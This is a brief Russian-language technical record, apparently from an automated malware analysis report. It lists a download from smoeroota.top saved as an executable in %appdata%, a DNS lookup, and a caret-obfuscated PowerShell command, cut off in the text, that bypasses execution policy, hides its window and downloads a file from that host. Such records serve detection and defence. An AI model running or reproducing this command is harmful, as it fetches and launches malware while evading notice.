Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PO^wE^Rs^helL.EX^e -EXEcuTI^oNPol^iC^Y bypA^ss^ -N^OpR^o^F^ILE -W^In^DoW^stYle^ HiD^DEN ^(nEW^-oBj^E^c^t ^syStE^m.^Ne^T^.WEbCL^i^E^Nt).down^LO^aDfil^e('http://smoeroota.top/re...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /c "PO^wE^Rs^helL.EX^e -EXEcuTI^oNPol^iC^Y bypA^ss^ -N^OpR^o^F^ILE -W^In^DoW^stYle^ HiD^DEN ^(nEW^-oBj^E^c^t ^syStE^m.^Ne^T^.WEbCL^i^E^Nt).down^LO^aDfil^e('http://smoeroota.top/re...' (со скрытым окном)